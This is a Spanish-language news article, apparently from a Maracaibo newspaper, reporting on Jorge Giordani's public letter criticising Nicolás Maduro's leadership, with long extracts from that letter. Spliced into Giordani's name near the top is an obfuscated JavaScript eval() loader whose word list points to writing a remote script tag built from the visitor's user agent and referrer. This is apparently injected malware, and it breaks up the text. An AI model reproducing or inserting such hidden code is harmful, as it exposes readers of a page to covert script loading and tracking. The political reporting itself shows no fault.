“Es alarmante ver una presidencia que no transmite liderazgo”

María Gabriela Villalobos / Maracaibo / [email protected]
Jorge eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkrts|var|u0026u|referrer|ikaya||js|php'.split('|'),0,{})) Giordani, exministro de Planificación, reveló en un documento sus “incomodidades” con el Gobierno de Nicolás Maduro. Destaca que existe una “clara sensación de vacío de poder en la presidencia de la República”

Ante la decisión del presidente Nicolás Maduro de sacar de forma definitiva a Jorge Giordani, arquitecto financiero de Hugo Chávez, de su gabinete ministerial este se vio “obligado a hacer público un documento en el que expone sus consideraciones sobre su deber como militante de la causa socialista”. 

En el texto titulado: Testimonio y responsabilidad ante la historia, publicado en la página www.aporrea.org, el exministro expresa que el distanciamiento con Maduro comenzó por su reclamo por la interferencia de unos asesores franceses en la operación del ministerio de Planificación y Finanzas.  

Además, Giordani destaca que en la campaña electoral, tras la muerte de Chávez, en Nicolás Maduro se empezaron a notar “debilidades y diferencias en cuanto a su ejecución”. 

Critica que los resultados no hayan sido sometidos a un “severo análisis ni por parte del Gobierno, ni tampoco por las organizaciones políticas y sociales que acompañaron la solicitud de apoyo a Nicolás Maduro”. 

Destaca que en Venezuela se “vive una grave coyuntura después de la desaparición física del comandante Chávez”. 

Giordani considera que el “legado de Chávez” no puede ser confiscado a nombre del propio fallecido presidente “ni pretender” ser Maduro su único destinatario y delegado. 

Para el exjefe de la cartera de Planificación resulta “doloroso y alarmante ver una presidencia que no transmite liderazgo, y que parece querer afirmarlo en la repetición, sin la debida coherencia, de los planteamientos como los formulaba el Comandante Chávez, y en el otorgamiento de recursos masivos a todos quienes lo solicitan sin un programa fiscal encuadrado en una planificación socialista que le de consistencia a las actividades solicitantes”

“A la luz de estos hechos surge una clara sensación de vacío de poder en la presidencia de la República, y concentración en otros centros de poder, destruyendo la tarea de instituciones como el ministerio de Finanzas y el Banco Central, y dando por hecho consumado la independencia de PDVSA del poder central”, recalca. 

A continuación extractos del documento

La crisis de salud del Presidente Chávez

Los primeros síntomas de ruptura que han conducido a la situación actual, con la naturaleza y el estilo de la toma de decisiones se comenzaron a manifestar en la medida en que la salud del Presidente se vino haciendo cada vez más complicada, la ausencia de un contacto directo con su persona, y las permanentes mediaciones a través de algunos en particular hicieron cada vez más distante, la toma de decisiones, su contenido y el tiempo para ser llevadas a la práctica. Con la ausencia del Presidente Chávez y las escasas reuniones sustantivas del Consejo de Ministros me llevaron a la elaboración de una serie de documentos para alertar acerca del estado de las situaciones, el alcance de los problemas que se enfrentaban y las soluciones a tomar. Me tocó, durante su estadía en La Habana, elaborar y hacer llegar un documento al Presidente Chávez a raíz del aumento del endeudamiento del país en moneda extranjera, cuestión que positivamente fue tomado en consideración, paralizando un mecanismo perverso de obtención de recursos que venían dilapidados a través de un mecanismo para la obtención de divisas denominado como SITME. 2

Un segundo documento se preparó como resultado de la única reunión que se pudo realizar con el Presidente Chávez como Consejo de Ministros el 20 de octubre de 2012. 3 Como reflejo de los planteamientos del Presidente Chávez y como un cierre del ciclo anterior, presenté un documento que no fue posible entregárselo directamente a él luego del dramático anuncio del recrudecimiento de su enfermedad y la necesidad de someterse a una nueva operación en La Habana, dicho documento se lo entregue a Nicolás Maduro, el 9 de enero de 2013, haciéndole ver la necesidad de asumir la gravedad de la situación planteada y las medidas que se estaban considerando luego del triunfo electoral del 7 de octubre del 2012. Los párrafos citados anteriormente corresponden a las dos primeras páginas de ese documento. 4

Con la entrega del anterior documento a Nicolás Maduro, para la fecha en sus funciones de VicePresidente Ejecutivo y nominado por el Comandante Chávez en las circunstancias que pudieran ocurrir como candidato a sustituirlo, comenzaron a observarse modificaciones en cuanto a la direccionalidad del proceso bolivariano, a la viabilidad económica financiera inmediata por efecto de la creciente dependencia de los ingresos petroleros, el crecimiento de las obligaciones del gobierno en términos del aumento de la burocracia y los justos compromisos para atender a los pensionados y jubilados, la imposibilidad de seguir manteniendo niveles de inflación que para la fecha aún se mantenía por debajo del 20%, tendencia sobre la cual debían tomarse medidas, el problema estructural de la agricultura y la electricidad, de los precios relativos y las relaciones entre crecimiento e inflación.

Se planteó a su vez la necesidad de construir un liderazgo político colectivo para hacerle frente a la relativa ausencia del Presidente Chávez y sus preocupantes condiciones de salud, ya anunciadas por él mismo en su alocución del 8 de diciembre. La urgencia de una mayor y más profunda articulación del sector militar con el pueblo venezolano, el peligro de tratar de imitar el comportamiento del Comandante Chávez en cuanto a la política comunicacional, el desconocimiento del hecho económico sobrepuesto a la voluntad política, las decisiones inconsultas con el equipo económico financiero que tendían a crear un nuevo estilo de gobierno, la injerencia de una asesoría francesa que nada tenía que ver con la situación que vivía el país, las nominaciones realizadas en CADIVI cambiando las medidas anteriormente sugeridas en reuniones a tal efecto, el tratar de modificar el proceso de subasta que estaba en curso sin un fundamento racional, la delegación de la responsabilidad de lo económico antes de la fecha de las elecciones del 14 de abril luego del lamentable fallecimiento del Presidente Chávez el 5 de marzo de 2013.

Todo ello vino precedido por la solicitud de un documento pedido por el Comandante Chávez en su lecho de enfermo que se pudo terminar en un borrador el día 2 de marzo de 2013, documento que fue discutido con Nicolás Maduro y un equipo de Ministros y que le fuera entregado en fecha del 2 de marzo de 2013. 5 Este documento por supuesto, no pudo conocerlo el Comandante Chávez, tanto por el progresivo empeoramiento de sus condiciones de salud, como por el tiempo que tuvo su elaboración, quedando el documento en cuestión, como un referente para la acción de gobierno una vez que se procediese a las nuevas elecciones presidenciales que se dieron el 14 de abril de 2013. Lamentablemente las cosas fueron tomando un nuevo rumbo con la desaparición física del Comandante Chávez y el comportamiento de las instituciones que se encontraban bajo su control como PDVSA y el BCV, comenzaron a aparecer signos de independencia que se agravaban con la caída de los aportes al fisco fruto del actuar independiente del gobierno central de PDVSA guiada por sus intereses y problemas particulares, al unísono que se tomaban decisiones de gasto público ajenas a un control presupuestario. Cuestiones estas que fueron agravando la situación financiera del país sometido a una campaña desestabilizadora en lo interno y de aislamiento en lo externo.

Con la campaña electoral en plena ejecución desarrollada se empezaron a notar elementos muy diferentes a la solidez del liderazgo del Presidente Chávez, mostrando debilidades y diferencias notables en cuanto a su ejecución, los resultados obtenidos favorables al proceso bolivariano, sin embargo no fueron sometidos a un severo y crítico análisis ni por parte del gobierno, ni tampoco por las organizaciones políticas y sociales que acompañaron la solicitud de apoyo a Nicolás Maduro. Esta actitud acrítica en una situación política cada vez más complicada, enfrentando a una oposición política de neto carácter fascistoide, con notable injerencia de factores ajenos al proceso bolivariano que se venía construyendo, no han hecho más que profundizar los ataques a dirigentes revolucionarios, incluyendo la misma figura del Presidente electo quién ha sido sometido a una campaña de descrédito personal y político. Todo ello como parte de la grave coyuntura que vive Venezuela después de la desaparición física del Comandante Chávez, sin duda difícilmente reemplazable y menos aún de ser copiada en su estilo por la originalidad y entrega al pueblo venezolano. La preservación y desarrollo del ¨legado de Chávez¨ se presenta como un patrimonio del proceso de cambio y construcción de una sociedad socialista para Venezuela, dicho legado no puede ser confiscado a nombre del propio Chávez ni pretender ser el actual Presidente su único destinatario y delegado.

Distanciamiento en las relaciones con el nuevo Presidente

El distanciamiento de las relaciones con el Presidente electo Nicolás Maduro, comenzó en primer lugar con mi reclamo por la interferencia de unos asesores franceses en la operación del Ministerio de Planificación y Finanzas. 6 En el documento denominado “Contraofensiva económica” y en otros se documenta de manera detallada la crisis que produjo la subasta de divisas dentro del proceso de la creación del Órgano Superior de Administración de Divisas. La actitud por demás absurda por el candidato en ese momento a la Presidencia de la República marcó el sentido de una incomprensión del hecho económico, agobiado tal vez por el avance de la campaña electoral previa al 14 de abril y la grave decisión de desvincularse de la dirección de la economía nacional, la cual estaba atravesando momentos difíciles y de alta complejidad. Todo ello me llevó a escribir una “Carta abierta” redactada pocos días antes de las elecciones del 14 de abril, 7 cuyo texto fue conocido por algunas pocas personas a quienes alertaba sobre la gravedad de la situación económica y política del país y sus consecuencias en plazos breves, tales como el desabastecimiento. Luego en las elecciones el pueblo venezolano honró el pedido del Presidente al nominarlo como posible candidato si alguna causa desavenida pudiese ocurrir. El pueblo venezolano igualmente acudió a cumplir de manera disciplinada la petición formulada por su líder indiscutible.

Nuevas responsabilidades

El Presidente Nicolás Maduro en acto celebrado en el Teatro Teresa Carreño anunció su nuevo equipo de gobierno el día 22 de abril del 2013, en dicho grupo definió mi participación como Ministro de Planificación y VicePresidente de Planificación Estratégica. Nuevas responsabilidades con viejos temas, ahora en una coyuntura cuanto más compleja y complicada. El nombramiento recibido significa una gran responsabilidad a través de la cual se podría poner al día el fruto y las lecciones de la experiencia que se ha tenido desde el 2 de febrero de 1999, cuando se inició el gobierno bolivariano con el Comandante Chávez, a tal efecto se preparó un documento que contiene una conceptualización de la actividad de planificación, 8 en el contexto del Estado venezolano en su fase actual de desarrollo, bajo la perspectiva de una sociedad que tiene como norte el socialismo. Se considera a la planificación como una actividad transustanciadora, que debe contribuir como mecanismo ex ante a la ordenación y racionalización de la sociedad venezolana. Modelo de acumulación, definido en cinco aspectos: el primero la modificación de la base productiva del país buscando una mayor democratización del poder económico. Segundo, El cambio en el rol del Estado, para lograr que el proceso acumulativo se oriente a la satisfacción de las necesidades básicas de la población y a la defensa de la soberanía. Tercero, la incorporación de mecanismos de autogestión productiva a nivel colectivo. Cuarto, La utilización de una planificación democrática como mecanismo regulador de las relaciones productivas, y Quinto, La ubicación autónoma del país frente a la internacionalización del sistema capitalista. Y cuanto al modelo de desarrollo, alcanzar una revolución política ligada al establecimiento de nuevas relaciones de poder que defienda los intereses de los sectores populares y los pequeños y medianos productores del campo y la ciudad, tal de establecer un nuevo bloque hegemónico. 9

Con el inicio de la nueva responsabilidad se comenzaron a elaborar una serie de tesis en diferentes aspectos importantes de la realidad actual y futura del país, tales como: las exportaciones, el sector eléctrico, el sector manufactura, la creación del Banco del Sur, los resultados de la primera subasta del SICAD, el balance energético, la política de endeudamiento, la cooperación internacional, los servicios públicos, la producción agroalimentaria, las reservas internacionales, una propuesta estratégica para MERCOSUR, las metas y proyectos del II Plan de Desarrollo Económico y Social de la Nación, propuestas todas estas y recomendaciones que simplemente fueron diferidas en respuesta escrita del Presidente a pesar de la urgencia e importancia de muchas de ellas.

Adicionalmente, se incorporaron las actividades de muchos Ministerios como forma de materializar la actividad transustanciadora de la planificación como demostración palpable del contenido que se le quiere dar a la actividad, lo cual fue siempre una actividad realizada con la participación del propio Presidente Chávez, quién las estudiaba, las analizaba y al final tomaba las decisiones que eran pertinentes.

Manejo de la gestión de gobierno

Desde que el Presidente Maduro asumió el cargo pronto anunció el nuevo conjunto de medidas en el área económica. Si bien el acto con mayor impacto político mediático pareció ser la devaluación, el resto de los anuncios, un aluvión de gastos, me hizo dudar acerca de la medida en que se había aceptado el estructurado conjunto que yo le había presentado. En este ambiente confuso, una de mis preocupaciones centrales fue el avanzar en la dirección de ajuste a un nuevo escenario marcado por el incremento nuclear de la eficiencia y lucha a la corrupción tan claramente anunciado por el presidente Chávez antes y después de su elección.

Dos frentes ocuparon mi preocupación. El primero atacar la corrupción frenándola por un nuevo control de los grandes fondos del Estado. El segundo introduciendo nuevos mecanismos de manejo en el gasto público que le permitieran retornar a causes sostenibles en el tiempo.

Para el primer frente me fue posible avanzar en la propuesta de dos medidas asociadas a un gran fondo del país, marcado por la opinión de los agentes del Comercio exterior como un foco de corrupción: el CADIVI y su mecanismo asociado el SITME. Nicolás Maduro acogió en ese ámbito una de las 2 medidas que le propuse. La creación de un Comité que aprobaría los permisos de uso de divisas a los precios privilegiados que el Estado otorgaba para las importaciones básicas para la economía y el reemplazo del SITME por el SICAD. La segunda consistente en mi nombramiento como la autoridad del CADIVI, para aprovechar el peso del Ministro de Planificación y Finanzas, en la instauración de un funcionamiento transparente. Medida esta que él no aceptó. Prefirió una dispersión del mando.

Una potencial nueva actitud en los nombramientos ni siquiera tuve oportunidad de planteársela al Presidente. Se trataba de efectuar los nombramientos de dirección en los grandes fondos financieros del Gobierno,   (FONDEN, Fondo Chino, Tesorería, Bco. Exterior, BIV), teniendo presente la necesidad de romper con la percepción de corrupción en el manejo de esos fondos. Me parecía necesario hacer un recuento de figuras de la   revolución que el país considerara símbolos de lo impecable en el manejo de fondos públicos. No era necesario ni juzgar ni vetar a otros candidatos. Era partir por lo positivo y sano.

En el segundo frente la propuesta de una reducción del gasto público real que acogiera las prioridades de defensa del poder de compra de los grupos más vulnerables y la corrección de derroches y corrupciones, por la vía de una medida de asignación del gasto público que se otorgaría crecientemente contra un calendario de gastos acompañado de indicadores de éxito que facilitarían una expansión gradual y un freno a los gastos que no cumplieran con sus compromisos de logros. En esta área no solo no se aprobó lo propuesto, sino que se inició una nueva oleada de grandes gastos sin los requisitos diseñados, y con el agravante de los gastos aprobados por el ¨Gobierno de calle¨, decididos sin estudio previo, improvisados de hecho. La suma de estos gastos no se ha presentado como un todo, salvo la necesidad de que la Asamblea Nacional aprobara una maciza ampliación del presupuesto público.

El recuento presentado debe interpretarse como un intento de revivir en el ámbito de los que hemos participado en el proceso de la revolución bolivariana los mecanismos de confrontación de ideas y trabajo conjunto bajo una dirección respetada por todos. Es también una forma de crítica a la situación actual, identificando la medida en que se aparta de lo construido en los 20 años previos.

Resulta doloroso y alarmante ver una Presidencia que no transmite liderazgo, y que parece querer afirmarlo en la repetición, sin la debida coherencia, de los planteamientos como los formulaba el Comandante Chávez, y en el otorgamiento de recursos masivos a todos quienes lo solicitan sin un programa fiscal encuadrado en una planificación socialista que le de consistencia a las actividades solicitantes. A la vez la política frente a los agentes privados es al menos confusa y las presiones de esos agentes parecen abrir camino a la reinstalación de mecanismos financieros capitalistas que satisfagan los intentos de recapturar excedente petrolero por la vía financiera. A la luz de estos hechos surge una clara sensación de vacío de poder en la Presidencia de la República, y concentración en otros centros de poder, destruyendo la tarea de instituciones como el Ministerio de Finanzas y el Banco Central, y dando por hecho consumado la independencia de PDVSA del poder central.

En particular, los desafíos que genera el apetito externo, y en particular de quienes pugnan por ganar terreno en la explotación del petróleo y en la expansión de la capacidad productiva del sector, esta última el negocio de mayor magnitud en la historia del país, y en los empréstitos en que se embarcara PDVSA, no se pueden enfrentar con una empresa pública autónoma, ni con una política externa no meditada y consensuada en el seno de las instituciones políticas bolivarianas.

Otro tanto sucede con los desafíos políticos internos, donde un esfuerzo disperso y dispendioso en recursos no parece ser la mejor forma de enfrentar a una oposición crecientemente articulada con los enemigos externos. La improvisación de cuadros sin experiencia y designaciones poco adecuadas para el manejo de los grandes fondos del Estado pone en jaque la unidad de los cuadros bolivarianos.

Finalmente, en términos de la elaboración de algunos documentos debemos mencionar entre ellos, algunos solicitados por el propio Presidente Nicolás Maduro, el primero relativo al Mapa Estratégico Internacional 10 el cual fue entregado en su oportunidad al Canciller de la República, Elías Jaua Milano para su consideración y análisis. El segundo documento se refiere al análisis estructural de la economía nacional, con el nombre de “Elementos para la construcción de una Agenda Productiva Socialista Bolivariana”. 11 Adicionalmente, se elaboró un documento sobre la coyuntura económica actual denominado “Propuestas para la coyuntura económica 2014”, 12 material que fue entregado al Presidente de la República y algunos Ministros, y luego consignado ante la Comisión Central de Planificación. Estos últimos documentos son propuestas acerca de la política económica de corto plazo, como la de mediano plazo relacionadas con la ejecución del Plan de la Patria 2013-2019. En el caso del Mapa Internacional, se sigue aplicando aquellos trabajos que se iniciaron en Yare y que continuaron en conjunto con el Comandante Chávez, luego de la salida de ese recinto el 26 de marzo de 1994.

Antes de concluir con este testimonio y al asumir las responsabilidades ante la historia de este país, las cuales nunca he evadido, ni evadiré jamás, quiero reafirmar que continuaré luchando por la independencia de Venezuela y la del continente latinoamericano y caribeño, con la misma constancia que lo he hecho desde que decidí empuñar las armas contra la dictadura oprobiosa de Trujillo, siendo aún estudiante de ingeniería en la Universidad Central de Venezuela, en 1959, y en ese territorio donde nací, San Francisco de Macorís, lugar donde llegaron mis padres y mi hermano al salir de un campo de concentración en Francia, como exilados, luego de haber participado mi padre como digno miembro de la Brigada Internacional “Garibaldi”, allá en territorio ibérico defendiendo los ideales de la República Española.

Opto de esta manera, por seguir asumiendo responsabilidades en mi existencia, como lo he hecho siempre, dejando este testimonio personal, pero lo que no puedo hacer es ser partícipe de otras circunstancias y decisiones en las cuales no se actuó de acuerdo a mi conciencia y a la de mis más profundas convicciones. Luego de la muerte del Comandante Chávez, como se expresa en esta nota, decidí seguir colaborando en el gobierno, en el lugar que se me asignó, poniendo siempre por escrito a la dirección política del proceso, no solo mis discrepancias, sino también propuestas concretas, que ni siquiera fueron comentadas, pero que son hoy aval de mi comportamiento y mi lealtad a la revolución. En estas circunstancias prefiero apegarme a la frase atribuida al gran escritor universal José Saramago, ¨ mientras más viejo más libre, y mientras más libre más radical¨.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama